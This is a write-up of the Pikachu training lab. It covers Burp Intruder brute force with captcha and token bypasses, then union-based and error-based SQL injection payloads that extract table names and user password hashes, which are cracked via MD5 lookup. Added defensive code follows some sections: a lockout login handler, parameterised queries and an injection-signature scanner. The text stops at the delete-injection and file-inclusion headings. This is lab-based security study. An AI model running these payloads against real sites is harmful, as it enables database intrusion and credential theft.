pikachu lab
Form-based brute force
Look at the page: there are two input fields, so brute-force them with Cluster bomb.
Prerequisite knowledge (Burp Intruder attack types):
Sniper: substitutes the positions marked with $$ one at a time
Battering ram: substitutes the same payload into all marked positions at once
Pitchfork: multiple parameters, each stepped through its own wordlist in parallel
Cluster bomb: multiple parameters brute-forced as a Cartesian product, every combination across the positions
![image-20240106170922421](/images/baidian.png)
Capture the request in Burp, send it to Intruder, and mark the fields to modify.
![image-20240106172837929](/images/baidian.png)
Set the payloads: payload sets 1 and 2 get type Simple list, load the wordlists, Start attack, then sort by Length and the valid credentials stand out.
![image-20240106173552716](/images/baidian.png)
![image-20240106173710480](/images/baidian.png)
Captcha bypass (on server)
This level adds a captcha on top of the previous one; capture the request in Burp and take a look.
![image-20240106175349992](/images/baidian.png)
![image-20240106175447344](/images/baidian.png)
After several attempts with wrong credentials there was never a captcha error, which means the captcha can be reused indefinitely, so brute-force it the same way as above.
![image-20240106180220452](/images/baidian.png)
Captcha bypass (on client)
Trying an input produces a popup, so the check is in the front end; look at the front-end captcha code, createCode()
![image-20240106180744168](/images/baidian.png)
Same configuration as before, still succeeds; front-end validation is simply ignored by Burp.
![image-20240106181150699](/images/baidian.png)
Token anti-brute-force
No captcha this time; looking up what a token means: a token used for verification, to prevent CSRF attacks.
![image-20240106181327759](/images/baidian.png)
Trying it in Burp shows "csrf token error"; the token changes with every request.
![image-20240106181732603](/images/baidian.png)
Then tried deleting the token: the response returned nothing at all. The front-end code contains a hidden input whose token value, on testing, turns out to be the token for the next request.
![image-20240106182058588](/images/baidian.png)
Choose the Pitchfork attack type, because Cluster bomb would permute all three payload sets and we want them stepped one-to-one.
Set the third payload type to Recursive grep.
![image-20240106183022342](/images/baidian.png)
On this screen tick the checkbox first, then Add.
Double-click the value content in the picture below and the regular expression is filled in automatically.
![image-20240106182931544](/images/baidian.png)
![image-20240106182805463](/images/baidian.png)
Also set the thread count to 1, because each request must use the token returned in the previous response; with multiple threads the order gets mixed up.
![image-20240106183153247](/images/baidian.png)
Last step: start the attack and it is done.
![image-20240106181150699](/images/baidian.png)
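The three levels above fail for three separate reasons: the server-side captcha is never invalidated after use, the client-side captcha is never checked by the server, and the rotating token stops CSRF but not a single-threaded wordlist run. As an added defensive example (my own code, not the post's or the pikachu lab's), a login handler that closes all three gaps; the user store, threshold and lockout window are assumed demo values.

```python
import hmac
import secrets
import time
from hashlib import sha256

# Assumed demo store; a real deployment keeps users in a database with a proper password hash.
USERS = {"admin": sha256(b"123456").hexdigest()}
MAX_FAILURES = 5          # failed attempts before lockout (assumption)
LOCKOUT_SECONDS = 900     # lockout window in seconds (assumption)

class LoginGuard:
    """Server-side state for one session: single-use captcha, rotating token, lockout counter."""

    def __init__(self):
        self.captcha = None                 # value the client must echo back; None once consumed
        self.token = secrets.token_hex(16)  # anti-CSRF token, rotated on every login attempt
        self.failures = {}                  # username -> (count, timestamp of last failure)

    def issue_captcha(self):
        self.captcha = secrets.token_hex(3)
        return self.captcha

    def rotate_token(self):
        self.token = secrets.token_hex(16)
        return self.token

    def login(self, username, password, captcha, token, now=None):
        now = time.time() if now is None else now
        # 1. The token must match, and it is replaced whether or not the login succeeds.
        if not hmac.compare_digest(token or "", self.token):
            self.rotate_token()
            return "csrf token error"
        self.rotate_token()
        # 2. The captcha is consumed on first use: replaying it with a new password fails.
        if self.captcha is None or not hmac.compare_digest(captcha or "", self.captcha):
            self.captcha = None
            return "captcha error"
        self.captcha = None
        # 3. Lockout: a wordlist run trips this long before it reaches the right password.
        count, last = self.failures.get(username, (0, 0.0))
        if count >= MAX_FAILURES and now - last < LOCKOUT_SECONDS:
            return "account locked"
        stored = USERS.get(username)
        if stored is not None and hmac.compare_digest(stored, sha256(password.encode()).hexdigest()):
            self.failures.pop(username, None)
            return "ok"
        self.failures[username] = (count + 1, now)
        return "login failed"
```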
Numeric injection
Look at the source: the input is not processed at all, so capture the request in Burp and modify it directly.
![image-20240106151935487](/images/baidian.png)
id=1 order by 2#&submit=%E6%9F%A5%E8%AF%A2
order by 3 errors while order by 2 works, so the column count is 2.
![image-20240106152129838](/images/baidian.png)
Follow the usual process and dump the database name
id=1 union select 1,database()#
pikachu
![image-20240106152230550](/images/baidian.png)
Dump tables
id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind
![image-20240106153135338](/images/baidian.png)
Dump columns
id=1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()#
id,userid,ipaddress,useragent,httpaccept,remoteport,id,username,pw,sex,phonenum,address,email,id,content,time,id,username,password,level,id,time,content,name
![image-20240106153628531](/images/baidian.png)
Next, the data in those columns.
1 union select username,password from users#
e10adc3949ba59abbe56e057f20f883e
670b14728ad9902aecba32e22fa4f6bd
e99a18c428cb38d5f260853678922e03
These look like MD5 hashes; look them up with an online MD5 decoder:
123456
000000
abc123
![image-20240106154303478](/images/baidian.png)
Character-type injection
Look at the source: the closing character to account for is a single quote.
![image-20240106154748027](/images/baidian.png)
Enter the universal injection; a change in the output proves the statement is correct.
1' or 1=1#
![image-20240106160648855](/images/baidian.png)
Determine the column count, same reasoning as in numeric injection.
1' order by 2#
![image-20240106161105159](/images/baidian.png)
Dump database
1' union select 1,database()#
pikachu
![image-20240106161441309](/images/baidian.png)
Dump tables
1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind
![image-20240106161626457](/images/baidian.png)
Dump columns
1' union select group_concat(column_name),2 from information_schema.columns where table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password
![image-20240106161930701](/images/baidian.png)
Dump values
1' union select username,password from users#
your uid:admin
your email is: e10adc3949ba59abbe56e057f20f883e
your uid:pikachu
your email is: 670b14728ad9902aecba32e22fa4f6bd
your uid:test
your email is: e99a18c428cb38d5f260853678922e03
Likewise, decode the hashes with MD5.
XX-type injection
Look at the source: a single quote and a parenthesis.
![image-20240106162921052](/images/baidian.png)
Give it a try
1') or 1=1#
Success; continue with the same process.
![image-20240106163010759](/images/baidian.png)
Dump database
1') union select 1,database()#
pikachu
![image-20240106163204223](/images/baidian.png)
Dump tables
1') union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind
![image-20240106163542815](/images/baidian.png)
Dump columns
1') union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password
![image-20240106163650158](/images/baidian.png)
Dump values
1') union select username,password from users#
your uid:admin
your email is: e10adc3949ba59abbe56e057f20f883e
your uid:pikachu
your email is: 670b14728ad9902aecba32e22fa4f6bd
your uid:test
your email is: e99a18c428cb38d5f260853678922e03
Search-type injection
Look at the source: a single quote and a percent sign.
![image-20240106164830745](/images/baidian.png)
1%' or 1=1#
Success; same old process.
![image-20240106165729611](/images/baidian.png)
Determine the column count; this one only errors at 4.
1%' order by 4#
So the column count is 3.
![image-20240106165854525](/images/baidian.png)
Dump database
1%' union select 1,2,database()#
pikachu
![image-20240106170035180](/images/baidian.png)
Dump tables
1%' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind
![image-20240106170318503](/images/baidian.png)
Dump columns
1%' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password
![image-20240106170604331](/images/baidian.png)
Dump values
1%' union select username,password,3 from users#
username:admin
uid:e10adc3949ba59abbe56e057f20f883e
email is: 3
username:pikachu
uid:670b14728ad9902aecba32e22fa4f6bd
email is: 3
username:test
uid:e99a18c428cb38d5f260853678922e03
email is: 3
![image-20240106170727433](/images/baidian.png)
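The four levels above differ only in the character that closes the literal (nothing, ', ') or %'); the root cause is the same string concatenation each time. As an added example (my own code, not the lab's PHP), the four query shapes built by concatenation next to their bound-parameter equivalents, on a constructed SQLite table; because SQLite has no MySQL-style # comment, the probes used in the test end in -- instead.

```python
import sqlite3

def make_db():
    """Constructed demo table; only the shape of pikachu's users table is mirrored."""
    db = sqlite3.connect(":memory:")
    db.execute("create table users (id integer, username text, password text)")
    db.executemany("insert into users values (?,?,?)",
                   [(1, "admin", "hash1"), (2, "pikachu", "hash2"), (3, "test", "hash3")])
    return db

# level name -> (concatenated template, parameterised template, wrapper applied to the bound value)
TEMPLATES = {
    "numeric": ("select username,password from users where id={v}",
                "select username,password from users where id=?", lambda v: v),
    "char":    ("select username,password from users where username='{v}'",
                "select username,password from users where username=?", lambda v: v),
    "xx":      ("select username,password from users where username=('{v}')",
                "select username,password from users where username=(?)", lambda v: v),
    "search":  ("select username,password from users where username like '%{v}%'",
                "select username,password from users where username like ?", lambda v: f"%{v}%"),
}

def query_vulnerable(db, level, value):
    """Concatenation: the closing character inside the input ends the literal and the rest is SQL."""
    sql = TEMPLATES[level][0].format(v=value)
    return db.execute(sql).fetchall()

def query_safe(db, level, value):
    """Bound parameter: the whole input is one value, whatever quotes, parentheses or comments it holds.
    For the numeric level a real handler would additionally reject anything that is not an integer."""
    _, sql, wrap = TEMPLATES[level]
    return db.execute(sql, (wrap(value),)).fetchall()
```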
"insert/update" injection
Look at the source: characters are escaped, so union injection can no longer be used; switch to error-based injection.
![image-20240108155928405](/images/baidian.png)
Capture the registration page request in Burp and dump the database name
1' or updatexml(1,concat(0x7e,database()),1) or'
![image-20240108170743140](/images/baidian.png)
Dump tables
1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1) or'
![image-20240108170849529](/images/baidian.png)
Dump columns
1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1) or'
![image-20240108171315501](/images/baidian.png)
Dump values
1' or updatexml(1,concat(0x7e,(select group_concat(username,'@',password)from pikachu.users)),1) or'
![image-20240108172516526](/images/baidian.png)
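Every request in the union-based levels and in the error-based level above leaves a recognisable shape in the query string or form body. As an added detection example (my own code, not from the post), a small scanner that URL-decodes each request until it stops changing and matches the payload shapes used in this walkthrough; the log lines and paths are constructed, not real pikachu logs.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the payload shapes used in the walkthrough above.
SIGNATURES = {
    "column-count probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union-based":        re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema enumeration": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "error-based":        re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "tautology":          re.compile(r"\bor\s+1\s*=\s*1\b", re.I),
}

def decode(value):
    """URL-decode until the string stops changing, so double-encoded payloads are seen as well."""
    prev = None
    while value != prev:
        prev, value = value, unquote_plus(value)
    return value

def classify(request_line):
    """Return the signature names that match the decoded request line."""
    decoded = decode(request_line)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(lines):
    """Return (line, findings) for every line that matches at least one signature."""
    return [(line, classify(line)) for line in lines if classify(line)]

# Constructed sample lines modelled on the requests in the walkthrough (paths are invented).
SAMPLE_LOG = [
    "GET /lab/sqli_numeric.php?id=1+order+by+2%23&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1",
    "GET /lab/sqli_char.php?name=1%27+union+select+1,database()%23 HTTP/1.1",
    "POST /lab/register.php username=1'+or+updatexml(1,concat(0x7e,database()),1)+or' HTTP/1.1",
    "GET /lab/sqli_char.php?name=pikachu HTTP/1.1",
]

if __name__ == "__main__":
    for line, hits in scan_log(SAMPLE_LOG):
        print(", ".join(hits), "<-", line)
```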
"delete" injection
Look at the source code:
![image-20240108174822691](/images/baidian.png)
File inclusion (local)
First look at the source: there are no restrictions.
![image-20240111135440561](/images/baidian.png)